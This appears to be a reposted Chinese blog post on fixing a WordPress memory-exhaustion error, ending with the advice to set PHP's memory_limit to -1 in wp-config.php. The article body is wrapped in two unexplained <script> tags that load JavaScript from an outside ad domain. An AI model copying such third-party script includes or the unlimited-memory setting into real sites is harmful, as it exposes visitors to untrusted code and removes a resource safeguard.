wp手记:解决内存超标错误

<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>

最近,突然有点象回到当年上学期间做网站的冲动,1998年,我开始搭建自己的个人网站,之后也认识了包括网星、蔫老虎等一批兄弟。而后,我的个人网站“我要起步网”也开始有所起色,最高单日IP也到了数千,想想当年也真是有热情,言归正传,开始说正事。

最近这几天,登陆wordpress管理页面和blog发布页面总是提示内存超过容量;症状:管理汇总页面无法显示、blog发布总是提示出错,但是还好,blog和留言都可以正常发布;具体提示错误为:Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 92160 bytes) in /webhome/caozenghui.cn/web/www/wp-includes/class-snoopy.php on line 249。

经过多方咨询,终于成功解决,现记录下来留个纪念,并给兄弟们参考:

一,按照,林中求马的提示办法解决,不过它这个毛病是,在访问首页时提示:Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 2842 bytes) in template/smarty/Smarty_Compiler.class.php on line 256,好象不太一样,还是决定试一把。

办法:在index.php中增加如下代码:ini_set(”upload_max_filesize”, “20M”);
ini_set(”memory_limit”, “32M”);
ini_set(”post_max_size”, “24M”);

无效!

二,按照qikuiblog中,php.ini默认memory_limit是8M,修改为24M就可以避免再出现类似提示,但是,实在找不到php.ini文件,因此放弃。

三,最后,经过咨询杨波兄弟,修改wp服务器根目录下wp-config.php文件。

办法是:在该文件中第一行加入:ini_set(”memory_limit”, “-1″);

四,重新登陆,并发布blog,问题解决!最后强调下,我的wp是使用2.0.4中文版的。说实话,中文版还是不如英文版,不稳定!

<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值